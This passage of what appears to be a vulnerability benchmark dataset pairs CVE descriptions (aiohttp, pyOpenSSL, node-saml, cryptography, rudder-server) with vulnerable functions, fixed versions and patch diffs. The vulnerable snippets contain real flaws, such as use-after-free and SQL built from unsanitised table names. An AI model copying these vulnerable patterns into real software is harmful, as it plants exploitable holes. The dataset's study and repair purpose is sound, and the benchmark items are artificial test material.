headers.get(hdrs.CONTENT_ENCODING)\n if enc:\n enc = enc.lower()\n if enc in (\"gzip\", \"deflate\", \"br\"):\n encoding = enc\n\n # chunking\n te = headers.get(hdrs.TRANSFER_ENCODING)\n if te and \"chunked\" in te.lower():\n chunked = True\n\n return (headers, raw_headers, close_conn, encoding, upgrade, chunked)"}], "fix_func": [{"id": "fix_py_103_1", "commit": "f016f06", "file_path": "aiohttp/http_parser.py", "start_line": "457", "end_line": "503", "snippet": " def parse_headers(\n self, lines: List[bytes]\n ) -> Tuple[\n \"CIMultiDictProxy[str]\", RawHeaders, Optional[bool], Optional[str], bool, bool\n ]:\n \"\"\"Parses RFC 5322 headers from a stream.\n\n Line continuations are supported. Returns list of header name\n and value pairs. Header name is in upper case.\n \"\"\"\n headers, raw_headers = self._headers_parser.parse_headers(lines)\n close_conn = None\n encoding = None\n upgrade = False\n chunked = False\n\n # keep-alive\n conn = headers.get(hdrs.CONNECTION)\n if conn:\n v = conn.lower()\n if v == \"close\":\n close_conn = True\n elif v == \"keep-alive\":\n close_conn = False\n elif v == \"upgrade\":\n upgrade = True\n\n # encoding\n enc = headers.get(hdrs.CONTENT_ENCODING)\n if enc:\n enc = enc.lower()\n if enc in (\"gzip\", \"deflate\", \"br\"):\n encoding = enc\n\n # chunking\n te = headers.get(hdrs.TRANSFER_ENCODING)\n if te is not None:\n te_lower = te.lower()\n if \"chunked\" in te_lower:\n chunked = True\n\n if hdrs.CONTENT_LENGTH in headers:\n raise BadHttpMessage(\n \"Content-Length can't be present with Transfer-Encoding\",\n )\n\n return (headers, raw_headers, close_conn, encoding, upgrade, chunked)"}], "vul_patch": "--- a/aiohttp/http_parser.py\n+++ b/aiohttp/http_parser.py\n@@ -34,7 +34,14 @@\n \n # chunking\n te = headers.get(hdrs.TRANSFER_ENCODING)\n- if te and \"chunked\" in te.lower():\n- chunked = True\n+ if te is not None:\n+ te_lower = te.lower()\n+ if \"chunked\" in te_lower:\n+ chunked = True\n+\n+ if hdrs.CONTENT_LENGTH in headers:\n+ raise BadHttpMessage(\n+ \"Content-Length can't be present with Transfer-Encoding\",\n+ )\n \n return (headers, raw_headers, close_conn, encoding, upgrade, chunked)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-1000807", "cve_description": "Python Cryptographic Authority pyopenssl version prior to version 17.5.0 contains a CWE-416: Use After Free vulnerability in X509 object handling that can result in Use after free can lead to possible denial of service or remote code execution.. This attack appear to be exploitable via Depends on the calling application and if it retains a reference to the memory.. This vulnerability appears to have been fixed in 17.5.0.", "cwe_info": {"CWE-416": {"name": "Use After Free", "description": "The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory \"belongs\" to the code that operates on the new pointer."}}, "repo": "https://github.com/pyca/pyopenssl", "patch_url": ["https://github.com/pyca/pyopenssl/commit/e73818600065821d588af475b024f4eb518c3509"], "programing_language": "Python", "vul_func": [{"id": "vul_py_426_1", "commit": "f724786", "file_path": "src/OpenSSL/SSL.py", "start_line": 311, "end_line": 336, "snippet": " def wrapper(ok, store_ctx):\n cert = X509.__new__(X509)\n cert._x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n error_number = _lib.X509_STORE_CTX_get_error(store_ctx)\n error_depth = _lib.X509_STORE_CTX_get_error_depth(store_ctx)\n\n index = _lib.SSL_get_ex_data_X509_STORE_CTX_idx()\n ssl = _lib.X509_STORE_CTX_get_ex_data(store_ctx, index)\n connection = Connection._reverse_mapping[ssl]\n\n try:\n result = callback(\n connection, cert, error_number, error_depth, ok\n )\n except Exception as e:\n self._problems.append(e)\n return 0\n else:\n if result:\n _lib.X509_STORE_CTX_set_error(store_ctx, _lib.X509_V_OK)\n return 1\n else:\n return 0\n\n self.callback = _ffi.callback(\n \"int (*)(int, X509_STORE_CTX *)\", wrapper)"}, {"id": "vul_py_426_2", "commit": "f724786", "file_path": "src/OpenSSL/crypto.py", "start_line": 3006, "end_line": 3087, "snippet": "def load_pkcs12(buffer, passphrase=None):\n \"\"\"\n Load a PKCS12 object from a buffer\n\n :param buffer: The buffer the certificate is stored in\n :param passphrase: (Optional) The password to decrypt the PKCS12 lump\n :returns: The PKCS12 object\n \"\"\"\n passphrase = _text_to_bytes_and_warn(\"passphrase\", passphrase)\n\n if isinstance(buffer, _text_type):\n buffer = buffer.encode(\"ascii\")\n\n bio = _new_mem_buf(buffer)\n\n # Use null passphrase if passphrase is None or empty string. With PKCS#12\n # password based encryption no password and a zero length password are two\n # different things, but OpenSSL implementation will try both to figure out\n # which one works.\n if not passphrase:\n passphrase = _ffi.NULL\n\n p12 = _lib.d2i_PKCS12_bio(bio, _ffi.NULL)\n if p12 == _ffi.NULL:\n _raise_current_error()\n p12 = _ffi.gc(p12, _lib.PKCS12_free)\n\n pkey = _ffi.new(\"EVP_PKEY**\")\n cert = _ffi.new(\"X509**\")\n cacerts = _ffi.new(\"Cryptography_STACK_OF_X509**\")\n\n parse_result = _lib.PKCS12_parse(p12, passphrase, pkey, cert, cacerts)\n if not parse_result:\n _raise_current_error()\n\n cacerts = _ffi.gc(cacerts[0], _lib.sk_X509_free)\n\n # openssl 1.0.0 sometimes leaves an X509_check_private_key error in the\n # queue for no particular reason. This error isn't interesting to anyone\n # outside this function. It's not even interesting to us. Get rid of it.\n try:\n _raise_current_error()\n except Error:\n pass\n\n if pkey[0] == _ffi.NULL:\n pykey = None\n else:\n pykey = PKey.__new__(PKey)\n pykey._pkey = _ffi.gc(pkey[0], _lib.EVP_PKEY_free)\n\n if cert[0] == _ffi.NULL:\n pycert = None\n friendlyname = None\n else:\n pycert = X509.__new__(X509)\n pycert._x509 = _ffi.gc(cert[0], _lib.X509_free)\n\n friendlyname_length = _ffi.new(\"int*\")\n friendlyname_buffer = _lib.X509_alias_get0(\n cert[0], friendlyname_length\n )\n friendlyname = _ffi.buffer(\n friendlyname_buffer, friendlyname_length[0]\n )[:]\n if friendlyname_buffer == _ffi.NULL:\n friendlyname = None\n\n pycacerts = []\n for i in range(_lib.sk_X509_num(cacerts)):\n pycacert = X509.__new__(X509)\n pycacert._x509 = _lib.sk_X509_value(cacerts, i)\n pycacerts.append(pycacert)\n if not pycacerts:\n pycacerts = None\n\n pkcs12 = PKCS12.__new__(PKCS12)\n pkcs12._pkey = pykey\n pkcs12._cert = pycert\n pkcs12._cacerts = pycacerts\n pkcs12._friendlyname = friendlyname\n return pkcs12"}], "fix_func": [{"id": "fix_py_426_1", "commit": "e73818600065821d588af475b024f4eb518c3509", "file_path": "src/OpenSSL/SSL.py", "start_line": 311, "end_line": 337, "snippet": " def wrapper(ok, store_ctx):\n x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n _lib.X509_up_ref(x509)\n cert = X509._from_raw_x509_ptr(x509)\n error_number = _lib.X509_STORE_CTX_get_error(store_ctx)\n error_depth = _lib.X509_STORE_CTX_get_error_depth(store_ctx)\n\n index = _lib.SSL_get_ex_data_X509_STORE_CTX_idx()\n ssl = _lib.X509_STORE_CTX_get_ex_data(store_ctx, index)\n connection = Connection._reverse_mapping[ssl]\n\n try:\n result = callback(\n connection, cert, error_number, error_depth, ok\n )\n except Exception as e:\n self._problems.append(e)\n return 0\n else:\n if result:\n _lib.X509_STORE_CTX_set_error(store_ctx, _lib.X509_V_OK)\n return 1\n else:\n return 0\n\n self.callback = _ffi.callback(\n \"int (*)(int, X509_STORE_CTX *)\", wrapper)"}, {"id": "fix_py_426_2", "commit": "e73818600065821d588af475b024f4eb518c3509", "file_path": "src/OpenSSL/crypto.py", "start_line": 3006, "end_line": 3086, "snippet": "def load_pkcs12(buffer, passphrase=None):\n \"\"\"\n Load a PKCS12 object from a buffer\n\n :param buffer: The buffer the certificate is stored in\n :param passphrase: (Optional) The password to decrypt the PKCS12 lump\n :returns: The PKCS12 object\n \"\"\"\n passphrase = _text_to_bytes_and_warn(\"passphrase\", passphrase)\n\n if isinstance(buffer, _text_type):\n buffer = buffer.encode(\"ascii\")\n\n bio = _new_mem_buf(buffer)\n\n # Use null passphrase if passphrase is None or empty string. With PKCS#12\n # password based encryption no password and a zero length password are two\n # different things, but OpenSSL implementation will try both to figure out\n # which one works.\n if not passphrase:\n passphrase = _ffi.NULL\n\n p12 = _lib.d2i_PKCS12_bio(bio, _ffi.NULL)\n if p12 == _ffi.NULL:\n _raise_current_error()\n p12 = _ffi.gc(p12, _lib.PKCS12_free)\n\n pkey = _ffi.new(\"EVP_PKEY**\")\n cert = _ffi.new(\"X509**\")\n cacerts = _ffi.new(\"Cryptography_STACK_OF_X509**\")\n\n parse_result = _lib.PKCS12_parse(p12, passphrase, pkey, cert, cacerts)\n if not parse_result:\n _raise_current_error()\n\n cacerts = _ffi.gc(cacerts[0], _lib.sk_X509_free)\n\n # openssl 1.0.0 sometimes leaves an X509_check_private_key error in the\n # queue for no particular reason. This error isn't interesting to anyone\n # outside this function. It's not even interesting to us. Get rid of it.\n try:\n _raise_current_error()\n except Error:\n pass\n\n if pkey[0] == _ffi.NULL:\n pykey = None\n else:\n pykey = PKey.__new__(PKey)\n pykey._pkey = _ffi.gc(pkey[0], _lib.EVP_PKEY_free)\n\n if cert[0] == _ffi.NULL:\n pycert = None\n friendlyname = None\n else:\n pycert = X509._from_raw_x509_ptr(cert[0])\n\n friendlyname_length = _ffi.new(\"int*\")\n friendlyname_buffer = _lib.X509_alias_get0(\n cert[0], friendlyname_length\n )\n friendlyname = _ffi.buffer(\n friendlyname_buffer, friendlyname_length[0]\n )[:]\n if friendlyname_buffer == _ffi.NULL:\n friendlyname = None\n\n pycacerts = []\n for i in range(_lib.sk_X509_num(cacerts)):\n x509 = _lib.sk_X509_value(cacerts, i)\n pycacert = X509._from_raw_x509_ptr(x509)\n pycacerts.append(pycacert)\n if not pycacerts:\n pycacerts = None\n\n pkcs12 = PKCS12.__new__(PKCS12)\n pkcs12._pkey = pykey\n pkcs12._cert = pycert\n pkcs12._cacerts = pycacerts\n pkcs12._friendlyname = friendlyname\n return pkcs12"}], "vul_patch": "--- a/src/OpenSSL/SSL.py\n+++ b/src/OpenSSL/SSL.py\n@@ -1,6 +1,7 @@\n def wrapper(ok, store_ctx):\n- cert = X509.__new__(X509)\n- cert._x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n+ x509 = _lib.X509_STORE_CTX_get_current_cert(store_ctx)\n+ _lib.X509_up_ref(x509)\n+ cert = X509._from_raw_x509_ptr(x509)\n error_number = _lib.X509_STORE_CTX_get_error(store_ctx)\n error_depth = _lib.X509_STORE_CTX_get_error_depth(store_ctx)\n \n\n--- a/src/OpenSSL/crypto.py\n+++ b/src/OpenSSL/crypto.py\n@@ -53,8 +53,7 @@\n pycert = None\n friendlyname = None\n else:\n- pycert = X509.__new__(X509)\n- pycert._x509 = _ffi.gc(cert[0], _lib.X509_free)\n+ pycert = X509._from_raw_x509_ptr(cert[0])\n \n friendlyname_length = _ffi.new(\"int*\")\n friendlyname_buffer = _lib.X509_alias_get0(\n@@ -68,8 +67,8 @@\n \n pycacerts = []\n for i in range(_lib.sk_X509_num(cacerts)):\n- pycacert = X509.__new__(X509)\n- pycacert._x509 = _lib.sk_X509_value(cacerts, i)\n+ x509 = _lib.sk_X509_value(cacerts, i)\n+ pycacert = X509._from_raw_x509_ptr(x509)\n pycacerts.append(pycacert)\n if not pycacerts:\n pycacerts = None\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-40178", "cve_description": "Node-SAML is a SAML library not dependent on any frameworks that runs in Node. The lack of checking of current timestamp allows a LogoutRequest XML to be reused multiple times even when the current time is past the NotOnOrAfter. This could impact the user where they would be logged out from an expired LogoutRequest. In bigger contexts, if LogoutRequests are sent out in mass to different SPs, this could impact many users on a large scale. This issue was patched in version 4.0.5.\n", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/node-saml/node-saml", "patch_url": ["https://github.com/node-saml/node-saml/commit/045e3b9c54211fdb95f96edf363679845b195cec"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_218_1", "commit": "58495fe", "file_path": "src/saml.ts", "start_line": 1262, "end_line": 1298, "snippet": " protected async processValidlySignedPostRequestAsync(\n this: SAML,\n doc: XMLOutput,\n dom: Document,\n ): Promise<{ profile: Profile; loggedOut: boolean }> {\n const request = doc.LogoutRequest;\n if (request) {\n const profile = {} as Profile;\n if (request.$.ID) {\n profile.ID = request.$.ID;\n } else {\n throw new Error(\"Missing SAML LogoutRequest ID\");\n }\n const issuer = request.Issuer;\n if (issuer && issuer[0]._) {\n profile.issuer = issuer[0]._;\n } else {\n throw new Error(\"Missing SAML issuer\");\n }\n const nameID = await getNameIdAsync(dom, this.options.decryptionPvk ?? null);\n if (nameID.value) {\n profile.nameID = nameID.value;\n if (nameID.format) {\n profile.nameIDFormat = nameID.format;\n }\n } else {\n throw new Error(\"Missing SAML NameID\");\n }\n const sessionIndex = request.SessionIndex;\n if (sessionIndex) {\n profile.sessionIndex = sessionIndex[0]._;\n }\n return { profile, loggedOut: true };\n } else {\n throw new Error(\"Unknown SAML request message\");\n }\n }"}], "fix_func": [{"id": "fix_js_218_1", "commit": "045e3b9c54211fdb95f96edf363679845b195cec", "file_path": "src/saml.ts", "start_line": 1262, "end_line": 1299, "snippet": " protected async processValidlySignedPostRequestAsync(\n this: SAML,\n doc: XMLOutput,\n dom: Document,\n ): Promise<{ profile: Profile; loggedOut: boolean }> {\n const request = doc.LogoutRequest;\n this.verifyLogoutRequest(doc);\n if (request) {\n const profile = {} as Profile;\n if (request.$.ID) {\n profile.ID = request.$.ID;\n } else {\n throw new Error(\"Missing SAML LogoutRequest ID\");\n }\n const issuer = request.Issuer;\n if (issuer && issuer[0]._) {\n profile.issuer = issuer[0]._;\n } else {\n throw new Error(\"Missing SAML issuer\");\n }\n const nameID = await getNameIdAsync(dom, this.options.decryptionPvk ?? null);\n if (nameID.value) {\n profile.nameID = nameID.value;\n if (nameID.format) {\n profile.nameIDFormat = nameID.format;\n }\n } else {\n throw new Error(\"Missing SAML NameID\");\n }\n const sessionIndex = request.SessionIndex;\n if (sessionIndex) {\n profile.sessionIndex = sessionIndex[0]._;\n }\n return { profile, loggedOut: true };\n } else {\n throw new Error(\"Unknown SAML request message\");\n }\n }"}], "vul_patch": "--- a/src/saml.ts\n+++ b/src/saml.ts\n@@ -4,6 +4,7 @@\n dom: Document,\n ): Promise<{ profile: Profile; loggedOut: boolean }> {\n const request = doc.LogoutRequest;\n+ this.verifyLogoutRequest(doc);\n if (request) {\n const profile = {} as Profile;\n if (request.$.ID) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-26130", "cve_description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Starting in version 38.0.0 and prior to version 42.0.4, if `pkcs12.serialize_key_and_certificates` is called with both a certificate whose public key did not match the provided private key and an `encryption_algorithm` with `hmac_hash` set (via `PrivateFormat.PKCS12.encryption_builder().hmac_hash(...)`, then a NULL pointer dereference would occur, crashing the Python process. This has been resolved in version 42.0.4, the first version in which a `ValueError` is properly raised.", "cwe_info": {"CWE-476": {"name": "NULL Pointer Dereference", "description": "The product dereferences a pointer that it expects to be valid but is NULL."}}, "repo": "https://github.com/pyca/cryptography", "patch_url": ["https://github.com/pyca/cryptography/commit/97d231672763cdb5959a3b191e692a362f1b9e55"], "programing_language": "Python", "vul_func": [{"id": "vul_py_427_1", "commit": "4398f19", "file_path": "src/cryptography/hazmat/backends/openssl/backend.py", "start_line": 491, "end_line": 647, "snippet": " def serialize_key_and_certificates_to_pkcs12(\n self,\n name: bytes | None,\n key: PKCS12PrivateKeyTypes | None,\n cert: x509.Certificate | None,\n cas: list[_PKCS12CATypes] | None,\n encryption_algorithm: serialization.KeySerializationEncryption,\n ) -> bytes:\n password = None\n if name is not None:\n utils._check_bytes(\"name\", name)\n\n if isinstance(encryption_algorithm, serialization.NoEncryption):\n nid_cert = -1\n nid_key = -1\n pkcs12_iter = 0\n mac_iter = 0\n mac_alg = self._ffi.NULL\n elif isinstance(\n encryption_algorithm, serialization.BestAvailableEncryption\n ):\n # PKCS12 encryption is hopeless trash and can never be fixed.\n # OpenSSL 3 supports PBESv2, but Libre and Boring do not, so\n # we use PBESv1 with 3DES on the older paths.\n if rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n # At least we can set this higher than OpenSSL's default\n pkcs12_iter = 20000\n # mac_iter chosen for compatibility reasons, see:\n # https://www.openssl.org/docs/man1.1.1/man3/PKCS12_create.html\n # Did we mention how lousy PKCS12 encryption is?\n mac_iter = 1\n # MAC algorithm can only be set on OpenSSL 3.0.0+\n mac_alg = self._ffi.NULL\n password = encryption_algorithm.password\n elif (\n isinstance(\n encryption_algorithm, serialization._KeySerializationEncryption\n )\n and encryption_algorithm._format\n is serialization.PrivateFormat.PKCS12\n ):\n # Default to OpenSSL's defaults. Behavior will vary based on the\n # version of OpenSSL cryptography is compiled against.\n nid_cert = 0\n nid_key = 0\n # Use the default iters we use in best available\n pkcs12_iter = 20000\n # See the Best Available comment for why this is 1\n mac_iter = 1\n password = encryption_algorithm.password\n keycertalg = encryption_algorithm._key_cert_algorithm\n if keycertalg is PBES.PBESv1SHA1And3KeyTripleDESCBC:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n elif keycertalg is PBES.PBESv2SHA256AndAES256CBC:\n if not rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n raise UnsupportedAlgorithm(\n \"PBESv2 is not supported by this version of OpenSSL\"\n )\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n assert keycertalg is None\n # We use OpenSSL's defaults\n\n if encryption_algorithm._hmac_hash is not None:\n if not self._lib.Cryptography_HAS_PKCS12_SET_MAC:\n raise UnsupportedAlgorithm(\n \"Setting MAC algorithm is not supported by this \"\n \"version of OpenSSL.\"\n )\n mac_alg = self._evp_md_non_null_from_algorithm(\n encryption_algorithm._hmac_hash\n )\n self.openssl_assert(mac_alg != self._ffi.NULL)\n else:\n mac_alg = self._ffi.NULL\n\n if encryption_algorithm._kdf_rounds is not None:\n pkcs12_iter = encryption_algorithm._kdf_rounds\n\n else:\n raise ValueError(\"Unsupported key encryption type\")\n\n if cas is None or len(cas) == 0:\n sk_x509 = self._ffi.NULL\n else:\n sk_x509 = self._lib.sk_X509_new_null()\n sk_x509 = self._ffi.gc(sk_x509, self._lib.sk_X509_free)\n\n # This list is to keep the x509 values alive until end of function\n ossl_cas = []\n for ca in cas:\n if isinstance(ca, PKCS12Certificate):\n ca_alias = ca.friendly_name\n ossl_ca = self._cert2ossl(ca.certificate)\n if ca_alias is None:\n res = self._lib.X509_alias_set1(\n ossl_ca, self._ffi.NULL, -1\n )\n else:\n res = self._lib.X509_alias_set1(\n ossl_ca, ca_alias, len(ca_alias)\n )\n self.openssl_assert(res == 1)\n else:\n ossl_ca = self._cert2ossl(ca)\n ossl_cas.append(ossl_ca)\n res = self._lib.sk_X509_push(sk_x509, ossl_ca)\n backend.openssl_assert(res >= 1)\n\n with self._zeroed_null_terminated_buf(password) as password_buf:\n with self._zeroed_null_terminated_buf(name) as name_buf:\n ossl_cert = self._cert2ossl(cert) if cert else self._ffi.NULL\n ossl_pkey = (\n self._key2ossl(key) if key is not None else self._ffi.NULL\n )\n\n p12 = self._lib.PKCS12_create(\n password_buf,\n name_buf,\n ossl_pkey,\n ossl_cert,\n sk_x509,\n nid_key,\n nid_cert,\n pkcs12_iter,\n mac_iter,\n 0,\n )\n\n if (\n self._lib.Cryptography_HAS_PKCS12_SET_MAC\n and mac_alg != self._ffi.NULL\n ):\n self._lib.PKCS12_set_mac(\n p12,\n password_buf,\n -1,\n self._ffi.NULL,\n 0,\n mac_iter,\n mac_alg,\n )\n\n self.openssl_assert(p12 != self._ffi.NULL)\n p12 = self._ffi.gc(p12, self._lib.PKCS12_free)\n\n bio = self._create_mem_bio_gc()\n res = self._lib.i2d_PKCS12_bio(bio, p12)\n self.openssl_assert(res > 0)\n return self._read_mem_bio(bio)"}], "fix_func": [{"id": "fix_py_427_1", "commit": "97d231672763cdb5959a3b191e692a362f1b9e55", "file_path": "src/cryptography/hazmat/backends/openssl/backend.py", "start_line": 491, "end_line": 656, "snippet": " def serialize_key_and_certificates_to_pkcs12(\n self,\n name: bytes | None,\n key: PKCS12PrivateKeyTypes | None,\n cert: x509.Certificate | None,\n cas: list[_PKCS12CATypes] | None,\n encryption_algorithm: serialization.KeySerializationEncryption,\n ) -> bytes:\n password = None\n if name is not None:\n utils._check_bytes(\"name\", name)\n\n if isinstance(encryption_algorithm, serialization.NoEncryption):\n nid_cert = -1\n nid_key = -1\n pkcs12_iter = 0\n mac_iter = 0\n mac_alg = self._ffi.NULL\n elif isinstance(\n encryption_algorithm, serialization.BestAvailableEncryption\n ):\n # PKCS12 encryption is hopeless trash and can never be fixed.\n # OpenSSL 3 supports PBESv2, but Libre and Boring do not, so\n # we use PBESv1 with 3DES on the older paths.\n if rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n # At least we can set this higher than OpenSSL's default\n pkcs12_iter = 20000\n # mac_iter chosen for compatibility reasons, see:\n # https://www.openssl.org/docs/man1.1.1/man3/PKCS12_create.html\n # Did we mention how lousy PKCS12 encryption is?\n mac_iter = 1\n # MAC algorithm can only be set on OpenSSL 3.0.0+\n mac_alg = self._ffi.NULL\n password = encryption_algorithm.password\n elif (\n isinstance(\n encryption_algorithm, serialization._KeySerializationEncryption\n )\n and encryption_algorithm._format\n is serialization.PrivateFormat.PKCS12\n ):\n # Default to OpenSSL's defaults. Behavior will vary based on the\n # version of OpenSSL cryptography is compiled against.\n nid_cert = 0\n nid_key = 0\n # Use the default iters we use in best available\n pkcs12_iter = 20000\n # See the Best Available comment for why this is 1\n mac_iter = 1\n password = encryption_algorithm.password\n keycertalg = encryption_algorithm._key_cert_algorithm\n if keycertalg is PBES.PBESv1SHA1And3KeyTripleDESCBC:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n elif keycertalg is PBES.PBESv2SHA256AndAES256CBC:\n if not rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n raise UnsupportedAlgorithm(\n \"PBESv2 is not supported by this version of OpenSSL\"\n )\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n assert keycertalg is None\n # We use OpenSSL's defaults\n\n if encryption_algorithm._hmac_hash is not None:\n if not self._lib.Cryptography_HAS_PKCS12_SET_MAC:\n raise UnsupportedAlgorithm(\n \"Setting MAC algorithm is not supported by this \"\n \"version of OpenSSL.\"\n )\n mac_alg = self._evp_md_non_null_from_algorithm(\n encryption_algorithm._hmac_hash\n )\n self.openssl_assert(mac_alg != self._ffi.NULL)\n else:\n mac_alg = self._ffi.NULL\n\n if encryption_algorithm._kdf_rounds is not None:\n pkcs12_iter = encryption_algorithm._kdf_rounds\n\n else:\n raise ValueError(\"Unsupported key encryption type\")\n\n if cas is None or len(cas) == 0:\n sk_x509 = self._ffi.NULL\n else:\n sk_x509 = self._lib.sk_X509_new_null()\n sk_x509 = self._ffi.gc(sk_x509, self._lib.sk_X509_free)\n\n # This list is to keep the x509 values alive until end of function\n ossl_cas = []\n for ca in cas:\n if isinstance(ca, PKCS12Certificate):\n ca_alias = ca.friendly_name\n ossl_ca = self._cert2ossl(ca.certificate)\n if ca_alias is None:\n res = self._lib.X509_alias_set1(\n ossl_ca, self._ffi.NULL, -1\n )\n else:\n res = self._lib.X509_alias_set1(\n ossl_ca, ca_alias, len(ca_alias)\n )\n self.openssl_assert(res == 1)\n else:\n ossl_ca = self._cert2ossl(ca)\n ossl_cas.append(ossl_ca)\n res = self._lib.sk_X509_push(sk_x509, ossl_ca)\n backend.openssl_assert(res >= 1)\n\n with self._zeroed_null_terminated_buf(password) as password_buf:\n with self._zeroed_null_terminated_buf(name) as name_buf:\n ossl_cert = self._cert2ossl(cert) if cert else self._ffi.NULL\n ossl_pkey = (\n self._key2ossl(key) if key is not None else self._ffi.NULL\n )\n\n p12 = self._lib.PKCS12_create(\n password_buf,\n name_buf,\n ossl_pkey,\n ossl_cert,\n sk_x509,\n nid_key,\n nid_cert,\n pkcs12_iter,\n mac_iter,\n 0,\n )\n if p12 == self._ffi.NULL:\n errors = self._consume_errors()\n raise ValueError(\n (\n \"Failed to create PKCS12 (does the key match the \"\n \"certificate?)\"\n ),\n errors,\n )\n\n if (\n self._lib.Cryptography_HAS_PKCS12_SET_MAC\n and mac_alg != self._ffi.NULL\n ):\n self._lib.PKCS12_set_mac(\n p12,\n password_buf,\n -1,\n self._ffi.NULL,\n 0,\n mac_iter,\n mac_alg,\n )\n\n self.openssl_assert(p12 != self._ffi.NULL)\n p12 = self._ffi.gc(p12, self._lib.PKCS12_free)\n\n bio = self._create_mem_bio_gc()\n res = self._lib.i2d_PKCS12_bio(bio, p12)\n self.openssl_assert(res > 0)\n return self._read_mem_bio(bio)"}], "vul_patch": "--- a/src/cryptography/hazmat/backends/openssl/backend.py\n+++ b/src/cryptography/hazmat/backends/openssl/backend.py\n@@ -133,6 +133,15 @@\n mac_iter,\n 0,\n )\n+ if p12 == self._ffi.NULL:\n+ errors = self._consume_errors()\n+ raise ValueError(\n+ (\n+ \"Failed to create PKCS12 (does the key match the \"\n+ \"certificate?)\"\n+ ),\n+ errors,\n+ )\n \n if (\n self._lib.Cryptography_HAS_PKCS12_SET_MAC\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-30625", "cve_description": "rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/rudderlabs/rudder-server", "patch_url": ["https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e", "https://github.com/rudderlabs/rudder-server/commit/9c009d9775abc99e72fc470f4c4c8e8f1775e82a", "https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30"], "programing_language": "Go", "vul_func": [{"id": "vul_go_28_1", "commit": "725e9e7", "file_path": "router/failed-events-manager.go", "start_line": 91, "end_line": 103, "snippet": "func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n\tif !failedKeysEnabled {\n\t\treturn\n\t}\n\n\t// Drop table\n\ttable := fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID)\n\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n\t_, err := fem.dbHandle.Exec(sqlStatement)\n\tif err != nil {\n\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n\t}\n}"}], "fix_func": [{"id": "fix_go_28_1", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 53, "end_line": 89, "snippet": "func (*FailedEventsManagerT) SaveFailedRecordIDs(taskRunIDFailedEventsMap map[string][]*FailedEventRowT, txn *sql.Tx) {\n\tif !failedKeysEnabled {\n\t\treturn\n\t}\n\n\tfor taskRunID, failedEvents := range taskRunIDFailedEventsMap {\n\t\ttable := getSqlSafeTablename(taskRunID)\n\t\tsqlStatement := fmt.Sprintf(`CREATE TABLE IF NOT EXISTS %s (\n\t\tdestination_id TEXT NOT NULL,\n\t\trecord_id JSONB NOT NULL,\n\t\tcreated_at TIMESTAMP NOT NULL);`, table)\n\t\t_, err := txn.Exec(sqlStatement)\n\t\tif err != nil {\n\t\t\t_ = txn.Rollback()\n\t\t\tpanic(err)\n\t\t}\n\t\tinsertQuery := fmt.Sprintf(`INSERT INTO %s VALUES($1, $2, $3);`, table)\n\t\tstmt, err := txn.Prepare(insertQuery)\n\t\tif err != nil {\n\t\t\t_ = txn.Rollback()\n\t\t\tpanic(err)\n\t\t}\n\t\tcreatedAt := time.Now()\n\t\tfor _, failedEvent := range failedEvents {\n\t\t\tif len(failedEvent.RecordID) == 0 || !json.Valid(failedEvent.RecordID) {\n\t\t\t\tpkgLogger.Infof(\"skipped adding invalid recordId: %s, to failed keys table: %s\", failedEvent.RecordID, table)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t_, err = stmt.Exec(failedEvent.DestinationID, 